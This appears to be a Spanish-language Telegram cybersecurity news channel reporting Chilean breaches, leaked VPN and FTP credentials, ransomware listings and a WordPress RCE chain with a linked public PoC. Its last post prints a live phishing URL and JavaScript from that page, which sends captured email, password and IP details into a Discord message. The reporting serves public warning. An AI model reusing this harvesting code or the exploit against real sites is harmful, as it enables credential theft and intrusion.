🇨🇱 Chileaks
1.12K subscribers
465 photos
5 videos
1 file
300 links
Canal chileno de noticias y actualidad sobre ciberseguridad: hackeos, filtraciones de datos, ransomware, vulnerabilidades, ciberataques y mucho más.

Ayudame con un boost: https://t.me/boost/chileaks
Download Telegram
🇨🇱 Chileaks
Todavía nos quedan varias conversaciones pendientes, el hecho de que nosotros en Chile tengamos Clave Única desde el Estado, puede ser un mecanismo en que desde esa plataforma se le comunica a la red social o a la app store que esta persona cumple o no con…
(Esto paso ayer 17-07-2026)

La Comisión de Futuro aprobó en general el proyecto que regula el acceso de menores de edad a plataformas digitales.

La propuesta busca proteger el bienestar físico, psicológico y social de niños, niñas y adolescentes. Para ello, plantea límites de edad y nuevas obligaciones para los proveedores de redes sociales.

El debate continuará en particular. En esa etapa, la comisión revisará aspectos como los mecanismos de verificación de edad, la protección de los datos personales y las responsabilidades de las plataformas.

Las comisiones de la Cámara continuarán el análisis de estas iniciativas durante las próximas sesiones. Conoce más sobre su tramitación y revisa las sesiones en el sitio de la Cámara de Diputadas y Diputados.
👍4😨3😱2
🇨🇱 Chileaks
(Esto paso ayer 17-07-2026) La Comisión de Futuro aprobó en general el proyecto que regula el acceso de menores de edad a plataformas digitales. La propuesta busca proteger el bienestar físico, psicológico y social de niños, niñas y adolescentes. Para ello…
Hay aproximadamente 1109 sitios web Chilenos que aún usan WordPress sin parchar.

Recordemos que WordPress sacó parche ayer para el CVE-2026-63030

CVE-2026-63030 es una vulnerabilidad crítica en WordPress Core (parte de la cadena conocida como wp2shell). Se trata de un Remote Code Execution (RCE) pre-autenticación que combina:CVE-2026-63030: Confusión de rutas (route confusion) en el endpoint REST API batch (/wp-json/batch/v1).
CVE-2026-60137: SQL Injection en WP_Query (específicamente en el parámetro author__not_in).

No requiere login, plugins ni configuración especial. Afecta instalaciones por defecto.


Versiones afectadas


WordPress 6.9.0 a 6.9.4 → Vulnerable al RCE completo (parcheado en 6.9.5).
WordPress 7.0.0 a 7.0.1 → Vulnerable al RCE completo (parcheado en 7.0.2).


Versiones 6.8.x solo afectadas por la SQLi sola (parche en 6.8.6). Versiones anteriores: no afectadas por esta cadena.

PoC: https://github.com/Icex0/wp2shell-poc
4🗿1
🇨🇱 0xPayload se atribuye deface a ohigginsfc.cl
🔥2
🇨🇱 Chileaks
🇨🇱 0xPayload se atribuye deface a ohigginsfc.cl
Además atacaron la web de la Municipalidad de Coquimbo ( municoquimbo.cl)
😱4🤔1
🇨🇱 Se reporta la filtración masiva de credenciales de pasarelas de VPN.

El actor de amenazas 77shafina8 ha publicado de forma gratuita en un foro especializado credenciales de acceso a pasarelas de VPN perimetral del Ministerio de Salud (appminsal.cl ).
😱52
🇨🇱 18 accesos FTP Chilenos publicados hoy fueron detectados en conocido foro .

Todo reportado a las victimas.
🎉6
El grupo de ransomware Qilin ha publicado en su blog a RECSA (recsalatam.com)

RECSA ofrece servicios de contact center a clientes en 16 mercados de América Latina incluido Chile.
👍5
En los últimos días he recibido varios avisos sobre campañas de phishing por mensaje directo. Muchas gracias a quienes se han tomado el tiempo de reportarlo.

Aprovecho de recordarles: si les llega algún SMS, correo o mensaje de WhatsApp que sea un fraude evidente, envíenmelo por mensaje privado. Los estaré analizando para publicar alertas y prevenir a la comunidad.
👍6🔥1
https://verificacion-avisofinalll.fwh.is

Oye si, chatgpt , hazme una pagina todo guapa para hacer fishin, no cometas errores.

var ip, ip2;
$.getJSON("https://api.ipify.org?format=json", function(data) {
ip = data.ip;
$.getJSON("https://ipinfo.io", function (response) {
ip2 = response.city + ", " + response.country;

// Crear el mensaje para Discord
var discordMessage = {
"content": "@everyone", // Mención a todos
"embeds": [
{
"title": "🔐 Nuevo Inicio de Sesión",
"color": 3447003,
"fields": [
{
"name": "📧 Correo Electrónico",
"value": u_name777,
"inline": false
},
{
"name": "🔒 Contraseña",
"value": u_name888,
"inline": false
},
{
"name": "🌍 IP y Ubicación",
"value": "IP: " + ip + "\nUbicación: " + ip2,
"inline": false
}
],
"timestamp": new Date().toISOString(),
"footer": {
"text": "Microsoft Login"
}
}
]
};
👻73😁2